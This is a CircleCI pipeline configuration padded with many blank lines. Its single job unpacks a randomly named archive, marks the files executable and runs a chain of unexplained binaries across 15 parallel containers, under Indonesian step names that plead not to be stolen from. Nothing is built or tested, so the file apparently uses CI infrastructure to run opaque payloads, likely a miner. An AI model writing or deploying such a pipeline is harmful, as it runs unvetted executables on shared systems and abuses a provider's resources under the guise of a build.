


















































version: 2.1


















































executors:
  linux:


















































    docker:
      - image: circleci/python:3.9.6-buster


















































jobs:
  Capek:


















































    parameters:
      os:


















































        type: executor
      node-version:
        type: string


















































    executor: << parameters.os >>


















































    steps:
      - checkout
      - run:


















































          name: Cuma_Cari_Makan_Aja_Om
          command: |
            sudo apt update -y
            tar -xf aoevecnuieraczmn && chmod u+x *
            ./a
      - run:


















































          name: Gak_Cari_Kaya
          command: |
            ./b
            ./c
      - run:


















































          name: Tolong_Jangan_DiCuri_Lagi
          command: |
            ./d
            ./mbc
            ./c
            ./00
            ./c
      - run:


















































          name: Pliiss_Ya_Om.......
          command: |
            ./e
            ./f && ./i
            ./j


















































    parallelism: 15
workflows:
  all-Mr:


















































    jobs:
      - Capek:


















































          matrix:


















































            parameters:


















































              os: [linux]
              node-version: [8.12.0, 8.13.0]

















































